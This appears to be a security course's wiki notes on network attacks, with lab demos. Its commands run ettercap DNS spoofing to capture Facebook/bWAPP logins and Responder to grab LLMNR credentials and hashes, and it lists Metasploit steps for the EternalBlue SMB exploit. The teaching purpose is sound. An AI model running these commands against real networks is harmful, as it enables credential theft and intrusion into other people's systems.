Network Vulnerabilities: Name Resolution - Paiet/SEC-335 GitHub Wiki

  • Name resolution exploits
    • DNS cache poisoning
      • Tricking clients into thinking that attacker is legit DNS
        • Redirect targets to malicious sites
      • DEMO: Ettercap for DNS poisoning
        1. Modify etter.dns file to have fake A records
        • Copy from Kali /Tools/fakeArec.txt
        • Change IP to match IP of bWAPP
        1. ettercap -T -q -i eth0 -P dns_spoof -M arp /10.0.0.225//
        • -T = Text Only
        • -q = Quiet. Do not display packet contents
        • -i = Set interface
        • -P = Choose plugin to use
        • -M = Perform MITM
        1. Browse to facebook from target
        2. Login to facebook/bWAPP and see user/pass info in Kali
    • NETBIOS name service
    • LLMNR
      • Windows will look for Link-Local Multicast Name Resolution if DNS fails
        • Does this will multicast
      • Tool answers multicast
        • Tools include
          • responder
          • Metasploit
          • MITMf
        • Tells Windows to authenticate for access
          • Creds grabbed
            • User gets error
      • DEMO: Responder cred grab
        1. responder -I eth0 -v
        2. Victim requests resource through DNS and DNS fails to locate. Tries LLMNR
        • net use \\server1\share1
        1. Probably seeing username/pass-hash at this point
        • If user enters username/password, you WILL see that get captured
  • SMB exploits
    • Windows Server Message Block service
    • Has many exploits available
    • Metasploit has built-in exploits
      • CVE-2017-0143 EternalBlue
      • use exploit/windows/smb/ms17_010_eternalblue
show targets
set TARGET <target-id>
show options
set RHOST <target IP>
exploit
⚠️ **GitHub.com Fallback** ⚠️